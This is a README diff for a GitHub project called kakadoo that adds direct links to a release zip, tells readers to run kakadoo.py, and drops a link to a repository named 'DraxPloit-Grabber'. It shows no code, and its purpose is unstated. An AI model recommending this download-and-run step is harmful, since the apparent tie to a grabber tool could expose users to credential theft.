DraxFM/kakadoo/README.md

 ### <a id="requirements"></a> :white_check_mark: - Requirements

 * [Python](https://www.python.org)
-* The latest release of kakadoo
+* The latest release of [kakadoo](https://github.com/DraxFM/kakadoo/releases/latest/download/draxfm-kakadoo.zip)
-* The code in this [Repository](https://github.com/DraxFM/DraxPloit-Grabber/archive/refs/heads/main.zip)

 ---

 ### <a id="installing"></a> :hammer: - Installing

-1. Install the latest release of kakadoo
+1. Install the latest release of [kakadoo](https://github.com/DraxFM/kakadoo/releases/latest/download/draxfm-kakadoo.zip)
-2. Extract the .zip file in the desired directory.
+2. Extract the **.zip** file in the desired directory.
-3. Run "kakadoo.py"
+3. Run "**kakadoo.py**"
 4. Wait until missing dependencies are installed.
 5. kakadoo is ready for use
 6. Enjoy!